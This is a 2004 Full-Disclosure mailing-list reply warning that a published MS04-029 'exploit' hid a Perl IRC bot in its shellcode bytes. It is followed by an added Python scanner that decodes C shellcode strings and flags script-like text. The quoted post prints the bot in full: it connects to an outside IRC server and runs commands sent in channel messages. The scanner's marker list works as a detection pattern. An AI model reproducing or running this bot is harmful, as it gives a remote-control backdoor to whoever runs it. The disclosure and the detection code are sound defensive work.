Yep, Dave pointed that out really fast...

> -----Original Message-----
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] On Behalf Of
> Barrie Dempster
> Sent: Wednesday, November 03, 2004 3:19 PM
> To: [EMAIL PROTECTED]
> Subject: Re: [Full-Disclosure] New Remote Windows Exploit (MS04-029)
>
>
> Excellent exploit, I'm sure no one will spot that perl IRC
> bot in there, nope no one will see that...
>
> (hint for the readers, try looking at the ascii output of
> the "char *shellcode_payload=" data, looks a little like the
> following....)
>
> [code]
> #!/usr/bin/perl
> $c
> han="#0x";$nick="k
> ";$server="ir3ip.n
> et";$SIG{TERM}={};
> exit if fork;use I
> O::Socket;$sock =
> IO::Socket::INET->
> new($server.":6667
> ")||exit;print $so
> ck "USER k +i k :k
> v1\nNICK k\n";$i=1
> ;while(<$sock>=~/^
> [^ ]+ ([^ ]+) /){$
> mode=$1;last if $m
> ode=="001";if($mod
> e=="433"){$i++;$ni
> ck=~s/\d*$/$i/;pri
> nt $sock "NICK $ni
> ck\n";}}print $soc
> k "JOIN $chan\nPRI
> VMSG $chan :Hi\n";
> while(<$sock>){if
> (/^PING (.*)$/){pr
> int $sock "PONG $1
> \nJOIN $chan\n";}i
> f(s/^[^ ]+ PRIVMSG
> $chan :$nick[^ :\
> w]*:[^ :\w]* (.*)$
> /$1/){s/\s*$//;$_=
> `$_`;foreach(split
> "\n"){print $sock
> "PRIVMSG $chan :$
> _\n";sleep 1;}}}#/
> tmp/hi
>
> [/code]
>
> --
> Barrie Dempster (zeedo) - Fortiter et Strenue
>
> http://www.bsrf.org.uk
>
> [ gpg --recv-keys --keyserver www.keyserver.net 0x96025FD0 ]
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
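The check Barrie describes above (dump the ASCII of the `char *shellcode_payload=` bytes before trusting a published exploit) as an added Python example; this is not code from the thread or from the MS04-029 exploit. It decodes the C string-literal escapes the way a compiler would, then prints the printable runs and flags any that look like an embedded interpreter script. The `SAMPLE_SOURCE` C snippet inside it is constructed for the demo and contains only a shebang line and a `use IO::Socket;` marker, not a working bot.

```python
from __future__ import annotations
import re

# Body of a C string literal; adjacent literals are concatenated by the compiler,
# so every literal in the source is collected and joined in order.
_LITERAL = re.compile(r'"((?:[^"\\]|\\.)*)"', re.S)
# One C escape: \xHH... (greedy hex digits, as in C), \ooo octal, or a one-char escape.
_ESCAPE = re.compile(r'\\(x[0-9A-Fa-f]+|[0-7]{1,3}|.)', re.S)
_SIMPLE = {'n': 10, 't': 9, 'r': 13, 'a': 7, 'b': 8, 'f': 12, 'v': 11,
           '\\': 92, '"': 34, "'": 39, '?': 63}


def unescape_literal(body: str) -> bytes:
    """Turn the text between the quotes of a C literal into the bytes it denotes."""
    out = bytearray()
    pos = 0
    for m in _ESCAPE.finditer(body):
        out += body[pos:m.start()].encode('latin-1')
        esc = m.group(1)
        if esc[0] == 'x':
            out.append(int(esc[1:], 16) & 0xff)
        elif esc[0] in '01234567':
            out.append(int(esc, 8) & 0xff)
        else:
            out.append(_SIMPLE.get(esc, ord(esc)))
        pos = m.end()
    out += body[pos:].encode('latin-1')
    return bytes(out)


def payload_bytes(c_source: str) -> bytes:
    """Concatenate every string literal found in the C source."""
    return b''.join(unescape_literal(m.group(1)) for m in _LITERAL.finditer(c_source))


def printable_runs(data: bytes, min_len: int = 8) -> list:
    """Like strings(1): runs of printable ASCII (tabs/newlines included) of at least min_len."""
    runs, cur = [], bytearray()
    for b in data:
        if 32 <= b < 127 or b in (9, 10, 13):
            cur.append(b)
        else:
            if len(cur) >= min_len:
                runs.append(cur.decode('ascii'))
            cur = bytearray()
    if len(cur) >= min_len:
        runs.append(cur.decode('ascii'))
    return runs


# Tokens that have no business inside raw machine-code shellcode but are typical of
# an interpreted script smuggled in as "payload" bytes.
SCRIPT_MARKERS = ('#!/', 'perl', 'python', 'IO::Socket', 'PRIVMSG', 'NICK ', 'JOIN ')


def suspicious_runs(runs: list) -> list:
    """Return the printable runs that look like an embedded script rather than opcodes."""
    return [r for r in runs if any(k in r for k in SCRIPT_MARKERS)]


# Constructed sample C source (hypothetical; not the exploit from the thread).
# Bytes: a few opcode-looking values, a NOP pair, then "#!/usr/bin/perl\n" and
# "use IO::Socket;\n" spelled out as \x escapes, then int 0x80 and a NUL.
SAMPLE_SOURCE = r'''
/* constructed sample, not the MS04-029 exploit */
char *shellcode_payload=
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
"\x90\x90"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x75\x73\x65\x20\x49\x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3b\x0a"
"\xcd\x80\x00";
'''


def scan_source(c_source: str) -> dict:
    """Summarise what the payload bytes contain in readable form."""
    runs = printable_runs(payload_bytes(c_source))
    return {'printable_runs': runs, 'suspicious': suspicious_runs(runs)}


if __name__ == '__main__':
    report = scan_source(SAMPLE_SOURCE)
    for run in report['printable_runs']:
        print('run:', repr(run))
    for run in report['suspicious']:
        print('SUSPICIOUS (looks like a script):', repr(run))
```

On a real exploit source, paste the file contents into `scan_source()`; a shebang or IRC protocol verbs showing up in what is supposedly x86 shellcode is the giveaway Barrie's hint points at, and it is worth checking on any code before it is compiled, let alone run.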
